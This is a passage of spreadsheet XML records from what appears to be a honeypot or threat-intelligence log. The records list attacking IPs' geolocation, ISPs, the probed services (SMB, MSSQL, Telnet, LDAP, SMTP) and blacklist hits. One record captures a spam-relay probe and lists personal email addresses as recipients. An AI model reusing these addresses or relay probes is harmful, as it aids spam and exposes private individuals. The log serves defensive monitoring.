    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73f5:5b6e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2249"/>
    <x v="2249"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T12:11:17"/>
    <d v="2025-03-30T21:45:27"/>
    <d v="2025-04-11T12:11:17"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="GUA"/>
    <s v="Guanajuato"/>
    <s v="León"/>
    <s v="Fraccionamiento Paraíso Real"/>
    <s v="8859563"/>
    <s v="NA"/>
    <s v="21.1125"/>
    <s v="-101.581"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="UNINET"/>
    <s v="residential"/>
    <s v="Gestión de direccionamiento UniNet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_SMB:Incoming connection (189.129.251.8,62691)}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,62872)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,61485)}&amp;&amp;{Data_SMB:Incoming connection (189.129.251.8,61822)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bd81:fb08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2250"/>
    <x v="2250"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T11:57:33"/>
    <d v="2025-04-11T11:56:01"/>
    <d v="2025-04-11T11:57:33"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="395003"/>
    <s v="21.1702"/>
    <s v="72.8311"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="RJIL South FTTX PUBLIC"/>
    <s v="None"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3125:f27c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2251"/>
    <x v="2251"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T11:44:34"/>
    <d v="2025-04-11T04:24:05"/>
    <d v="2025-04-11T11:44:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7360:8ab7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2252"/>
    <x v="2252"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T11:21:33"/>
    <d v="2025-04-11T11:21:33"/>
    <d v="2025-04-11T11:21:33"/>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3b5d:8c53"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2253"/>
    <x v="2253"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T11:03:01"/>
    <d v="2025-03-19T07:52:53"/>
    <d v="2025-04-11T11:03:01"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H45"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="RI"/>
    <s v="Riau"/>
    <s v="Kota Batam"/>
    <s v="Batam"/>
    <s v="6295587"/>
    <s v="NA"/>
    <s v="1.12873"/>
    <s v="104.055"/>
    <s v="59142"/>
    <s v="Pemerintah Kota Batam"/>
    <s v="Pemerintah Kota Batam"/>
    <s v="business"/>
    <s v="Pemerintah Kota Batam"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (160.25.212.1,64491)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a019:d401"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2254"/>
    <x v="2254"/>
    <s v="NA&amp;&amp;114-33-117-159.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-11T10:55:51"/>
    <d v="2025-03-21T10:51:03"/>
    <d v="2025-04-11T10:55:51"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="high"/>
    <s v="SMA-LAB_PJL_H43&amp;&amp;SMA-LAB_PJL_HC1"/>
    <s v="9100&amp;&amp;80"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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7221:759f"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2255"/>
    <x v="2255"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T10:54:06"/>
    <d v="2025-03-29T09:48:16"/>
    <d v="2025-04-11T10:54:06"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_LDAP_HC1"/>
    <s v="389"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Chennai"/>
    <s v="Manali"/>
    <s v="1263968"/>
    <s v="NA"/>
    <s v="13.1667"/>
    <s v="80.2667"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312b:f88d"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2256"/>
    <x v="2256"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T10:37:51"/>
    <d v="2025-03-17T09:48:41"/>
    <d v="2025-04-11T10:37:51"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20321"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="PT. Mora Telematika Indonesia"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d79:d812"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2257"/>
    <x v="2257"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T10:24:44"/>
    <d v="2025-04-11T08:34:14"/>
    <d v="2025-04-11T10:24:44"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram"/>
    <s v="1254163"/>
    <s v="NA"/>
    <s v="8.4855"/>
    <s v="76.9492"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:7eed"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2258"/>
    <x v="2258"/>
    <s v="199.26.81.116.megaegg.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-11T10:10:36"/>
    <d v="2025-04-02T13:37:04"/>
    <d v="2025-04-11T10:10:36"/>
    <n v="42"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="34"/>
    <s v="Hiroshima"/>
    <s v="Hatsukaichi-shi"/>
    <s v="Hatsukaichi"/>
    <s v="1863018"/>
    <s v="NA"/>
    <s v="34.35"/>
    <s v="132.333"/>
    <s v="18144"/>
    <s v="Enecom,Inc."/>
    <s v="Enecom, Inc."/>
    <s v="business"/>
    <s v="Energia Communications, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7451:1ac7"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2259"/>
    <x v="2259"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T10:09:37"/>
    <d v="2025-04-11T10:09:37"/>
    <d v="2025-04-11T10:09:37"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:b264"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2260"/>
    <x v="2260"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T09:21:48"/>
    <d v="2025-04-05T09:37:26"/>
    <d v="2025-04-11T09:21:48"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H45"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['exploits'&amp;&amp; 'spam']}"/>
    <n v="43"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KH"/>
    <s v="Cambodia"/>
    <s v="12"/>
    <s v="Phnom Penh"/>
    <s v="Chamkar Mon"/>
    <s v="Phnom Penh"/>
    <s v="1821306"/>
    <s v="NA"/>
    <s v="11.538499999999999"/>
    <s v="104.921"/>
    <s v="24492"/>
    <s v="WiCAM Corporation Ltd."/>
    <s v="WiCAM Corporation Ltd."/>
    <s v="business"/>
    <s v="100 95th Street, Group"/>
    <s v="2005-11-17"/>
    <s v="DiamondWeb"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca4f:1a1b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2261"/>
    <x v="2261"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T09:15:14"/>
    <d v="2025-04-11T02:57:17"/>
    <d v="2025-04-11T09:15:14"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fe:1e1f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2262"/>
    <x v="2262"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T09:10:30"/>
    <d v="2025-03-17T14:38:52"/>
    <d v="2025-04-11T09:10:30"/>
    <n v="21"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;abuseipdb"/>
    <s v="25&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Guri-si"/>
    <s v="Guri-si (Seongnae-ro 6-gil)"/>
    <s v="1841988"/>
    <s v="NA"/>
    <s v="37.5288"/>
    <s v="127.122"/>
    <s v="17877"/>
    <s v="KX NexG Co., LTD"/>
    <s v="KX NexG Co., LTD"/>
    <s v="business"/>
    <s v="Vaan"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 17 Mar 2025 18:08:52 +0900_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;edemlea52@gmail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;edemlea52@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;lea_edem12@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;leaedem13@outlook.fr&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;m_lewis.41@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;nicholas_mavis@yahoo.co.uk&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3e8:adb2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2263"/>
    <x v="2263"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:57:52"/>
    <d v="2025-03-06T13:29:02"/>
    <d v="2025-04-11T08:57:52"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Hooghly"/>
    <s v="Rishra"/>
    <s v="1258126"/>
    <s v="NA"/>
    <s v="22.7239"/>
    <s v="88.3456"/>
    <s v="23860"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="Alliance Broadband Services"/>
    <s v="residential"/>
    <s v="Alliance Broadband Services Pvt. Ltd."/>
    <s v="2008-09-11"/>
    <s v="ALLIANCEBROADBAND-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bb:284a"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2264"/>
    <x v="2264"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-11T08:36:20"/>
    <d v="2025-04-11T08:35:21"/>
    <d v="2025-04-11T08:36:20"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
